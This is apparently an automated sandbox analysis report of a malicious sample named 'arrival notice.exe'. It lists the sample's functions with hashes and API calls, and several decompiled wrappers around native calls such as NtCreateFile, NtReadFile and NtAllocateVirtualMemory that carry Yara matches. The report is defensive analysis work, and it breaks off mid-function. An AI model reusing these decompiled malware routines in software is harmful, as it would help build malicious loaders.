                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 85ec69daa336c60467c39a3588c1a106f024cd5fdc6007884fc5a7668055bbc0
                                                    • Instruction ID: 03bdb1fc95cb531b4569c3e9990f30384cc61a0d72eecd6a58398d2009fa4ca7
                                                    • Opcode Fuzzy Hash: 85ec69daa336c60467c39a3588c1a106f024cd5fdc6007884fc5a7668055bbc0
                                                    • Instruction Fuzzy Hash: 125123B4900649CFDB14CFA9C548BDEBBF4AF88314F24896AE409A7350D7746894CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009D9448, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 009D968E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 7446f0624480420740eb03c8caba090e2926d596a06e7496ccd5a884661819ac
                                                    • Instruction ID: db3c7a946a3b71263b176dcf746bb23127630e585da3d751830f37fc1ce683ea
                                                    • Opcode Fuzzy Hash: 7446f0624480420740eb03c8caba090e2926d596a06e7496ccd5a884661819ac
                                                    • Instruction Fuzzy Hash: 36712470A00B058FD724DF6AD04579AB7F9BF88304F108A2AE48AD7B51EB35E845CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009DFD98, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DFEAA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 964fabb29755e57bdf1c1b3067120359e4dab18dfea8299925a258ae3a69b2b5
                                                    • Instruction ID: 87774222b7f21b0ba7fc6515ccfd3e0d2c1e45a4d167acc7d407a172bdaf4794
                                                    • Opcode Fuzzy Hash: 964fabb29755e57bdf1c1b3067120359e4dab18dfea8299925a258ae3a69b2b5
                                                    • Instruction Fuzzy Hash: B241C0B1D003099FDB14CF99D895ADEBBB5FF48314F24852AE819AB311D774A885CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009D5364, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 009D5421
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 31aeea81c80b688b17381c064559ce770b1598f607f503d60ab835fee973dd5d
                                                    • Instruction ID: 6419752ef195d9cd5f3e7566f32d7697dad5580368f88a33753c7b1242e17eae
                                                    • Opcode Fuzzy Hash: 31aeea81c80b688b17381c064559ce770b1598f607f503d60ab835fee973dd5d
                                                    • Instruction Fuzzy Hash: E8413470C00658CFDB20CFA9C884BDDBBB5BF49308F24846AD418BB261DB712986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009D3E08, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 009D5421
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 7e9aa0f33be94782011c359dad2a7b91c57e3f7931e2518e5322aee5858a92a1
                                                    • Instruction ID: 484b163f937cd0394dc87395c3fa4332aad55d90c59f8bcc91ad4fccf364846a
                                                    • Opcode Fuzzy Hash: 7e9aa0f33be94782011c359dad2a7b91c57e3f7931e2518e5322aee5858a92a1
                                                    • Instruction Fuzzy Hash: 0D41E370C00618CFDB24DFA9C884BCEBBB5BF58309F24846AD419BB251DBB56985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009DBD60, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009DBDE7
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: dbc7ff20778923995d6c784c8adb7d49c4a3330396fea94289430e4e56f75e31
                                                    • Instruction ID: 1e7a4e0d7f5dfa62a7989e2c50d77cfea0af4bafe7ec8788f93c0e8e80849fd8
                                                    • Opcode Fuzzy Hash: dbc7ff20778923995d6c784c8adb7d49c4a3330396fea94289430e4e56f75e31
                                                    • Instruction Fuzzy Hash: AD21E2B5900248DFDB10CFAAD884ADEBBF8EB48320F14841AE914A3350D378A954CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009D87B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9709,00000800,00000000,00000000), ref: 009D991A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 696f5668053dea72c25b694c15be031aedc5f7eb920d369790fb081e2373340b
                                                    • Instruction ID: 4240c27af9c3ed7accc8bcb382ddfa108ee57542e822f3778af7a40675990141
                                                    • Opcode Fuzzy Hash: 696f5668053dea72c25b694c15be031aedc5f7eb920d369790fb081e2373340b
                                                    • Instruction Fuzzy Hash: AB1103B69002489FDB10DF9AC444ADEFBF8EB89724F14842AD815B7300D374A955CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009D98A8, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9709,00000800,00000000,00000000), ref: 009D991A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 58ac8a85dfe238de81080ed4b21647c96f05732e9a0cf13979d6d0068318c3bd
                                                    • Instruction ID: f7f6d239456510c3883205d4e4b395b7d0929e9f4b681778d542aed14e457c9e
                                                    • Opcode Fuzzy Hash: 58ac8a85dfe238de81080ed4b21647c96f05732e9a0cf13979d6d0068318c3bd
                                                    • Instruction Fuzzy Hash: 3B1106B6D002498FCB10CFAAD444ADEFBF4EB49324F14852AD455B7200C775A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009D9628, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 009D968E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 34683179391f0254e9684c1da3e7fb03455298ab80ba88a546b37905f8b660ef
                                                    • Instruction ID: 36bdc26cea716ceebf8badd47b1e2cd7a24c91afb9dba7891ecef3b651dbb6f5
                                                    • Opcode Fuzzy Hash: 34683179391f0254e9684c1da3e7fb03455298ab80ba88a546b37905f8b660ef
                                                    • Instruction Fuzzy Hash: F711DFB5C006498FDB10DF9AD444ADEFBF8EB88324F14852AD819B7700D379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0097D4C4, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380677740.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25635b2ca63feaf793f08acb69967390aac824adf9666836bc756e9e18ccdade
                                                    • Instruction ID: b90cffe569105de7096b7120bfb27a45b78e4c3b2e89c01106fe09d4d3efaf59
                                                    • Opcode Fuzzy Hash: 25635b2ca63feaf793f08acb69967390aac824adf9666836bc756e9e18ccdade
                                                    • Instruction Fuzzy Hash: EB21D372504240DFDB05DF54D9C4B66BF79FF88328F24C969E8091B25AC33AD856CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0098D01C, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380710787.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44e2648545d505a7ac360479839f932da2a4f6ef27020262a3052ac1228aee0e
                                                    • Instruction ID: 42bdf2d004fbcff13eb52e6da02c26c5c6e15cb44e5fe8958d4f44fd19e77be1
                                                    • Opcode Fuzzy Hash: 44e2648545d505a7ac360479839f932da2a4f6ef27020262a3052ac1228aee0e
                                                    • Instruction Fuzzy Hash: 79213471504200EFDB14EF60D8C4B26BB69FB84328F20C96DD8094B386C33AD847CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0098D1D4, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380710787.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 661c6617757a465c8dc91379ccc96f2e1fc90e6f40ee873707b075f3b170ab53
                                                    • Instruction ID: ba96961cec63385762a0c0a50c12be7dd02026d65785f08dcc61601e04b881d4
                                                    • Opcode Fuzzy Hash: 661c6617757a465c8dc91379ccc96f2e1fc90e6f40ee873707b075f3b170ab53
                                                    • Instruction Fuzzy Hash: 30212971504204EFDB05EF54D5C4F26BB69FB84324F24C96DD8094B385C33AD856CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0098D006, Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380710787.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e658f4e08a4d86b83b525f37bdebe337745ded2aa956bd7b1b04ca71219ecb34
                                                    • Instruction ID: 198fad31c9f986aeaa807866b00e0e1d84ce6e61e8b3b429a384c55916354315
                                                    • Opcode Fuzzy Hash: e658f4e08a4d86b83b525f37bdebe337745ded2aa956bd7b1b04ca71219ecb34
                                                    • Instruction Fuzzy Hash: 462180755093C08FCB02CF20D994715BF71EB46314F29C5DAD8498B697C33A984ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0097D4BF, Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380677740.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6489728979d3eb3dd0550309153c3d96a7fa8747dcb3024ccaacf1b4c2db4bd
                                                    • Instruction ID: 2d17bfb260fcd6013327017a4d71050faae302a0d9f97930c3ac9a3a9b96c3c2
                                                    • Opcode Fuzzy Hash: c6489728979d3eb3dd0550309153c3d96a7fa8747dcb3024ccaacf1b4c2db4bd
                                                    • Instruction Fuzzy Hash: 0011D376404280DFCB11CF10D5C4B16BF71FF84324F24C6A9E8490B65AC336D85ACBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0098D1CF, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380710787.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f8a3839bd71a8ba61a4793af4905639f8fbf9763a8bf81583d8f6f3e5335eb1
                                                    • Instruction ID: 2b384dfabce174e789ee6d8a4620ab3228242b7d8db1b702f60bd7823b2b230b
                                                    • Opcode Fuzzy Hash: 0f8a3839bd71a8ba61a4793af4905639f8fbf9763a8bf81583d8f6f3e5335eb1
                                                    • Instruction Fuzzy Hash: 10118875904280DFDB12DF14D5C4B15BBA1FB84324F28C6AAD8494B796C33AD85ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0097D745, Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380677740.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d0f9bd9750806f2712878717a7ad41501a02e1dcecb0724e9b599a74cfafa76
                                                    • Instruction ID: 4f9bb5e0e86866221e20231ba95b616a97d76679591894852089ff8dfd534f3d
                                                    • Opcode Fuzzy Hash: 3d0f9bd9750806f2712878717a7ad41501a02e1dcecb0724e9b599a74cfafa76
                                                    • Instruction Fuzzy Hash: 4601F7B2005340DEE7244B65CC84B66BFACDF81374F18C92AED0C5A286E3799840CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0097D744, Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380677740.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59f9528f3fe4a224036de7ae4a17679765a43f4ca81a53c55e23c12f29ce487e
                                                    • Instruction ID: 2994d739c4f4a378bb6a0205f7f17a5cd31d1a3c725a3a77b050c501b436ced3
                                                    • Opcode Fuzzy Hash: 59f9528f3fe4a224036de7ae4a17679765a43f4ca81a53c55e23c12f29ce487e
                                                    • Instruction Fuzzy Hash: BCF062724052449EEB248F15DC88B66FBACEF81774F18C55AED085B286D3799C44CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 009DE618, Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3671f656e4cbdcedb99ea0b723ad4bd9f565e4fec14b7cca9326c8ff05e2ee1c
                                                    • Instruction ID: a3582e1be9ac297e7fbc771a262293a38eef7a3f1f39ad8ab4924618c7dd42e8
                                                    • Opcode Fuzzy Hash: 3671f656e4cbdcedb99ea0b723ad4bd9f565e4fec14b7cca9326c8ff05e2ee1c
                                                    • Instruction Fuzzy Hash: E312C7F1D917468BE318EF65E8981893BB1BB49328FD04B08D2616FAD0D7B4116EEF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009DE612, Relevance: .2, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 917baa7f9e6a72b63dc720054e98c99562829cf9f3398cecbf37a98196f7cc59
                                                    • Instruction ID: 7fcadf494d0ae3a7a1e029f341d2d727de97f4324ff203e6e91e4391f7977e3a
                                                    • Opcode Fuzzy Hash: 917baa7f9e6a72b63dc720054e98c99562829cf9f3398cecbf37a98196f7cc59
                                                    • Instruction Fuzzy Hash: 42C14BF1C917468BD718EF65E8881C97BB1BB89328FD04B08D1616BAD0D7B4116EEF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: arrival notice.exe PID: 6400 Parent PID: 6224 arrival notice.exeCOMMON

                                                    Executed Functions

                                                    Function 0041867C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E0041867C(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				_t13 = _a4;
				_t30 = _a4 + 0xc48;
				E004191D0(_t28, _t13, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t29, _t32); // executed
				return _t18;
			}








                                                    0x00418683
                                                    0x0041868f
                                                    0x00418697
                                                    0x0041869c
                                                    0x004186a2
                                                    0x004186bd
                                                    0x004186c5
                                                    0x004186c9

                                                    APIs
                                                    • NtReadFile.NTDLL(b=A,5E972F61,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F61,00413D62,?,00000000), ref: 004186C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: !:A$b=A$b=A
                                                    • API String ID: 2738559852-704622139
                                                    • Opcode ID: b49bfe3e94cae1dcbc40abdafda298412c5c4fa63a8dfba4d2ee47c869c30831
                                                    • Instruction ID: 3089b46c72f5aab759fa85e3151979c9588bdfc581c9eb52c0f865024569e9d0
                                                    • Opcode Fuzzy Hash: b49bfe3e94cae1dcbc40abdafda298412c5c4fa63a8dfba4d2ee47c869c30831
                                                    • Instruction Fuzzy Hash: 8DF0F4B2200108ABCB08DF89DC84EEB77A9AF8C754F158249BE0D97241C630EC51CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                    0x00418683
                                                    0x0041868f
                                                    0x00418697
                                                    0x0041869c
                                                    0x004186a2
                                                    0x004186bd
                                                    0x004186c5
                                                    0x004186c9

                                                    APIs
                                                    • NtReadFile.NTDLL(b=A,5E972F61,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F61,00413D62,?,00000000), ref: 004186C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: !:A$b=A$b=A
                                                    • API String ID: 2738559852-704622139
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                    0x00409b4c
                                                    0x00409b4f
                                                    0x00409b54
                                                    0x00409b59
                                                    0x00409b63
                                                    0x00409b68
                                                    0x00409b6b
                                                    0x00409b6d
                                                    0x00409b75
                                                    0x00409b7a
                                                    0x00409b7a
                                                    0x00409b81
                                                    0x00409b89
                                                    0x00409b8c
                                                    0x00409b8e
                                                    0x00409ba2
                                                    0x00000000
                                                    0x00409ba4
                                                    0x00409baa
                                                    0x00409b5e
                                                    0x00409b5e
                                                    0x00409b5e

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E004185CA(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;
				void* _t34;

				asm("out 0x55, eax");
				_t18 = _a4;
				_t5 = _t18 + 0xc40; // 0xc40
				E004191D0(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}





                                                    0x004185cf
                                                    0x004185d3
                                                    0x004185df
                                                    0x004185e7
                                                    0x0041861d
                                                    0x00418621

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f78be1b140dab5305cbbf2f663d2df02f56d22fa14f1c90ace7b4b96278f10ac
                                                    • Instruction ID: d00bba17fc3c2051fc433998128fe7b50e416ad279f67ead831ebfa423176ce8
                                                    • Opcode Fuzzy Hash: f78be1b140dab5305cbbf2f663d2df02f56d22fa14f1c90ace7b4b96278f10ac
                                                    • Instruction Fuzzy Hash: 4001ABB2204208AFDB48CF89DC95EEB37EDAF8C754F158258BA0DD7241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                    0x004185df
                                                    0x004185e7
                                                    0x0041861d
                                                    0x00418621

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004187AC, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E004187AC(void* __ecx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;
				void* _t23;

				_push(0xec8b5510);
				_t10 = _v0;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191D0(_t23, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}






                                                    0x004187ae
                                                    0x004187b3
                                                    0x004187bf
                                                    0x004187c7
                                                    0x004187e9
                                                    0x004187ed

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: a5e1590b6d16597e439d821b267d88acc625dee58ee59e02f000c2c4b3e50d47
                                                    • Instruction ID: c8e2b5d723facf5517a7e53ecc7967b5bd8c8a80918e75e20dd9e98176ae4538
                                                    • Opcode Fuzzy Hash: a5e1590b6d16597e439d821b267d88acc625dee58ee59e02f000c2c4b3e50d47
                                                    • Instruction Fuzzy Hash: 2AF015B6200109BBDB18DF89DC95EEB77ADAF88354F158549FE08A7241D630E810CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
